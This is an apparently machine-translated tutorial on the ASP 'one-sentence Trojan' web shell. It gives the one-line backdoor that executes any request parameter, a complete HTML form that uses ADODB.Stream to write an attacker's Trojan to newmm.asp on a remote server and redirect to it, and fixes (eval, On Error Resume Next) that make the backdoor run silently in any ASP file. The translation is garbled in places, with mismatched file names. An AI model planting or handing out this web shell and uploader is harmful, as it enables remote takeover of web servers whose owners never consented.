An Analysis of the applicable environment and working principles/principles of a Trojan horse

 

Applicable environment of one-sentence Trojan:

1. the Guest account on the server has the write permission

2. The database address is known and the database format is asa or asp

3. If the database format is not asp or asa, you can insert a sentence to the asp file.

 

Principle of one-sentence Trojan:

"One-sentence Trojan" server (local html file submission)

This is the asp statement we want to use to insert to an asp file (not just a database file suffixed with asp). This statement will be triggered back to receive data submitted by intruders through the client, after the operation is completed, the server code is <% execute request ("value") %> in which value can be modified by yourself.

 

"One-sentence Trojan" client (asp file inserted with one sentence on the remote server)

Used to submit control data to the server. The submitted data is used to form and execute complete asp functional statements through the server, that is, to generate the asp Trojan file we need.

 

Now let's assume that the TEXT in the remote host is. ASP (client) already has the <% execute request ("value") %> statement .) in ASP, <% execute ............ ") %> indicates executing the statement in the ellipsis. if I write a statement that we have carefully constructed, it will also help us to execute it. based on the above ideas, we can construct a local form with the following content: (// annotation)

 

<Form action = http://www.bkjia.com/TEXT. asp method = post>

 

<Textarea name = value cols = 120 rows = 10 width = 45>

 

Set lP = server. createObject ("Adodb. Stream") // create a Stream object

LP. Open // Open

LP. Type = 2 // in text format

LP. CharSet = "gb2312" // font Standard

LP. writetext request ("newvalue ")

 

LP. SaveToFile server. mappath ("newmm. asp"), 2 // write the trojan content into newmm. asp by overwriting the file, and 2 by overwriting.

LP. Close // Close the object

Set lP = nothing // release the object

Response. redirect "newmm. asp" // switch to newmm. asp

 

</Textarea>

 

<Textarea name = newvalue cols = 120 rows = 10 width = 45> Add the trojan content </textarea> <BR> <center> <br>

<Input type = submit value = submit>

 

</Form>

 

The form is used to submit the content in the form to the TEXT of the remote host. ASP file. then, because of TEXT. ASP contains the <% execute request ("value") %> sentence, so this code will execute the content we sent from the form. (The form name must be the same as the value in <% execute request ("VALUE") %>, which is the two places marked in blue and must be equal)

 

Are you clear about this. we constructed two forms. The code in the first form is the code for file operations (that is, the content in the second form is written to the current directory and named newvalue. the second form is, of course, the trojan we want to write.

 

The specific section is as follows:

 

Set lP = server. createObject ("Adodb. Stream") // create a Stream object

LP. Open // Open

LP. Type = 2 // in text format

LP. CharSet = "gb2312" // font Standard

LP. writetext request ("newvalue ")

 

LP. SaveToFile server. mappath ("newvalue. asp"), 2 // write the trojan content into newmm. asp by overwriting the file, and 2 by overwriting.

LP. Close // Close the object

Set lP = nothing // release the object

Response. redirect "newmm. asp" // switch to newmm. asp

 

In this case, the name of the second form must be the same as newvalue in lP. writetext request ("Newvalue"), which is the two parts marked in red.

So far, as long as the server has the write permission, the content of the Trojan submitted by your form will be written to newmm. asp. Newmm. asp is our shell address.

 

 

Server errors:

 

Often, when we add a sentence to an asp file, the Type Mismatch Error will occur:

Script error detected at line 1.

Source line: execute request ("nettoo ")

Description: Type Mismatch: 'execute'

How can this problem be solved?

I have come up with a good solution. If I replace the "execute" server with "eval", there will be no errors!

Connect to the client in one sentence and add a fault tolerance statement. You can insert it into any ASP file without making any mistakes as before.

<% On Error Resume Next execute request ("value") %>